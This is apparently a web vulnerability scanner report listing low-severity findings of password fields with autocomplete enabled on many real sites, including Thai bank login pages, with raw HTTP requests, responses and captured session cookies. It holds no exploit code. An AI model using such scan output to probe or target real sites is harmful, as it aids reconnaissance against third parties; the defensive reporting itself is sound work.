To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


17.1. http://dl.scriptlogic.com/login/Combined.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
<body>
<form name="LoginForm" method="post" action="Combined.aspx?pid=108&amp;r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbCreatePassword" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbCreatePassword" /></td>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbCreatePasswordConf" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbCreatePasswordConf" /></td>
...[SNIP]...
<td><input name="ctl00$ContentPlaceHolder1$tbPassword" type="password" size="30" id="ctl00_ContentPlaceHolder1_tbPassword" onkeydown="fnTrapKD(ctl00_ContentPlaceHolder1_butLogin,event)" /></td>
...[SNIP]...

17.2. http://home.controlcase.com/piwik/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://home.controlcase.com
Path:   /piwik/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /piwik/ HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PIWIK_SESSID=7ef27p0ehe42dd0uvk2637blb6; path=/; HttpOnly
Expires:
Cache-Control: no-store, must-revalidate
Pragma:
X-Frame-Options: sameorigin
Content-Length: 2654
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head>
<title>Piwik &rsa
...[SNIP]...
<div id="login">
<form action="" name="loginform" id="loginform" method="post">
<p>
...[SNIP]...
<br />
<input type="password" name="form_password" id="form_password" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

17.3. https://home.controlcase.com/piwik/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.controlcase.com
Path:   /piwik/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /piwik/ HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:22:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PIWIK_SESSID=88mipb1p3ta5ct3ovomc03s0n7; path=/; secure; HttpOnly
Expires:
Cache-Control: no-store, must-revalidate
Pragma:
X-Frame-Options: sameorigin
Content-Length: 2654
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head>
<title>Piwik &rsa
...[SNIP]...
<div id="login">
<form action="" name="loginform" id="loginform" method="post">
<p>
...[SNIP]...
<br />
<input type="password" name="form_password" id="form_password" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

17.4. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ksec/K-CyberTrade-login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /K-Online/ksec/K-CyberTrade-login.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-Length: 10641
Set-Cookie: JSESSIONID=0001EidkyFV5kaz-4tiOC5P_auE:-1JC3VU2; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


   <script>
       if(location.href.indexOf("kgateway")>=0){
           window.location.href="https://online.kasikornbankgroup.com
...[SNIP]...
</TABLE>
<form name="loginActionForm" method="post" action="/K-Online/login.do">
<TABLE cellSpacing=0 cellPadding=0 width=510 align=center border=0>
...[SNIP]...
<TD>
<input type="password" name="password" value="" class="form_textbox">
</TD>
...[SNIP]...

17.5. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

17.6. http://th.linkedin.com/in/narongchai  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://th.linkedin.com
Path:   /in/narongchai

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /in/narongchai HTTP/1.1
Host: th.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0914326324168300109"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UvLCachlIU-Sw1chSdL-OsHxAUVtCbInth04RtWljKGt6M_FfhDx0w:1304429233:128b7631ce6fae821c3883417c1efbc688b51624"; Version=1; Max-Age=1799; Expires=Tue, 03-May-2011 13:57:12 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Set-Cookie: bcookie="v=1&0e90019a-e852-4952-934f-d122b3a07be8"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Last-Modified: Mon, 25 Apr 2011 08:41:54 GMT
Set-Cookie: bcookie=0bbc3d87-a199-4a56-a702-02cda34c0373; Domain=linkedin.com; Expires=Sun, 21-May-2079 16:41:21 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 03 May 2011 13:27:14 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...
<div class="content">


<form action="https://www.linkedin.com/profile/public-join-create" method="POST" name="coldRegistrationForm" >


<fieldset>
...[SNIP]...
</span>
<input type="password" name="password" value="" id="password-coldRegistrationForm" maxlength="250">
</div>
...[SNIP]...

17.7. http://truehits.net/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://truehits.net
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:46 GMT
Server: Apache
Content-Length: 52037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

17.8. http://truehits.net/stat.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:47 GMT
Server: Apache
Content-Length: 36450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

17.9. http://twitter.com/KBank_Live  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /KBank_Live

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /KBank_Live HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429270-36774-61300
ETag: "9236e9ba3a0e891747be7255c635d244"
Last-Modified: Tue, 03 May 2011 13:27:50 GMT
X-Runtime: 0.00769
Content-Type: text/html; charset=utf-8
Content-Length: 53135
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429270340580; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927034781083; path=/; expires=Thu, 02 Jun 2011 13:27:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEwVC7YvAToHaWQiJTExMWU1MmMyYTgzNDNl%250AZjQyZmZhNGQxNDI3NjdjN2E0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--96123277011b42aa09089579184a6267a5490ead; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="4e1f28446f4f702c8b9be5f3aaa7be9db47699b1" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

17.10. http://twitter.com/ktb_care  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ktb_care

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ktb_care HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429269-53062-58419
ETag: "cbafa3883481612c4be62e572b1b077f"
Last-Modified: Tue, 03 May 2011 13:27:49 GMT
X-Runtime: 0.00689
Content-Type: text/html; charset=utf-8
Content-Length: 51047
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429269377500; path=/; expires=Tue, 10-May-11 13:27:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442926938325767; path=/; expires=Thu, 02 Jun 2011 13:27:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIkRC7YvAToHaWQiJWUzODUxZmM5N2FkMGYy%250ANWU2OTc4YmFmZmUwYzAwZjMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e6495d6a809198515566fe70a30332990466c813; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="7d27604e385ff1c549d553afda8dcaf846683517" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

17.11. http://twitter.com/scb_thailand  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /scb_thailand

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /scb_thailand HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429274-73578-48757
ETag: "93bfce0d2f5b4a39cb77e73211eaca85"
Last-Modified: Tue, 03 May 2011 13:27:54 GMT
X-Runtime: 0.00777
Content-Type: text/html; charset=utf-8
Content-Length: 52433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429274280425; path=/; expires=Tue, 10-May-11 13:27:54 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927428828772; path=/; expires=Thu, 02 Jun 2011 13:27:54 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLEkC7YvAToHaWQiJTEzY2I3OGVjNDZiNWM0%250AZGQ4NmVhNzFjZDY3ZGU4MDcxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b99283e2490d1e5e9ee960699bef94c5d581e3f7; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6bf1d0aa8d96f9f55928144ab42d693513c15296" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

17.12. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:08 GMT
X-Varnish: 1509835285 1507595749
Age: 23086
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 71881


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
</div>
       <form name="registerForm" id="registerForm" action="javascript:doregister();" method="post" accept-charset="utf-8">
               <input type=hidden name="wpCreateaccount" value="1">
...[SNIP]...
</label>
           <input type="password" name="wpPassword" value="" tabindex=2 id="password" /><br/>
...[SNIP]...
</label>
           <input type="password" name="wpRetype" value="" tabindex=3 id="password2" />
       </div>
...[SNIP]...

17.13. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:08 GMT
X-Varnish: 1509835285 1507595749
Age: 23086
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 71881


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
</div>
       <form name="loginform" action="javascript:dologin();" method="post" accept-charset="utf-8">
               <input type=hidden name="isBasic" value="1">
...[SNIP]...
</label>
           <input type="password" tabindex=2 name="wpPassword" value="" id="password" /><br/>
...[SNIP]...

17.14. http://wikipediareview.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wikipediareview.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?showtopic\\x3d32014\\x22 HTTP/1.1
Host: wikipediareview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: 0session_id=11c93e765b7f96723766ab11a49d89be; path=/; domain=.wikipediareview.com
Connection: close
Content-Type: text/html
Content-Length: 68471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
<form action="http://wikipediareview.com/index.php?s=11c93e765b7f96723766ab11a49d89be&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="this.value=''" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="this.value=''" value="ibfrules" />
               <input class="button" type="image" src="stimg9x0b4fsr2/brack/login-button.gif" />
...[SNIP]...

17.15. http://wikipediareview.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wikipediareview.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: wikipediareview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: 0session_id=0553b519ff7765c08f04c4ee96af3d61; path=/; domain=.wikipediareview.com
Connection: close
Content-Type: text/html
Content-Length: 68471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
<form action="http://wikipediareview.com/index.php?s=0553b519ff7765c08f04c4ee96af3d61&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="this.value=''" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="this.value=''" value="ibfrules" />
               <input class="button" type="image" src="stimg9x0b4fsr2/brack/login-button.gif" />
...[SNIP]...

17.16. https://www.barclaysfantasyfundmanager.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.barclaysfantasyfundmanager.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.barclaysfantasyfundmanager.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 03 May 2011 13:04:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=qcrph4m5vx2ymr3pf14yy545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 50180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head id="ctl00_ctl00_Head"><title>
   Home - Barclays Fantasy Investment Port
...[SNIP]...
<![endif]-->


<form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ctl00$ContentPlaceHolderDefault$ContentPlaceHolderMain$ctl00$ctl00$ctl00$txtPassword" type="password" id="ctl00_ctl00_ContentPlaceHolderDefault_ContentPlaceHolderMain_ctl00_ctl00_ctl00_txtPassword" class="text" />
</div>
...[SNIP]...

17.17. https://www.bizpayment.ktb.co.th/epayview/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /epayview/ HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:32 GMT
Content-type: text/html;charset=utf-8
X-HP-CAM-COLOR: V=1;ServerAddr=sMVxqLQOS+/Q3oBiJs7EtA==;GUID=1|x02TzA7tbiYpm9br7GTUIA3-tyKGZdPujnJ-HNYIRFg.|L2VwYXl2aWV3L2luZGV4LmpzcA..
Set-Cookie: JSESSIONID=N16N74kl8KmPjvQjKWXLGtGgG2SbBbqGGhm3rQgrkGPLvbQYVzJQ!1246557006; path=/
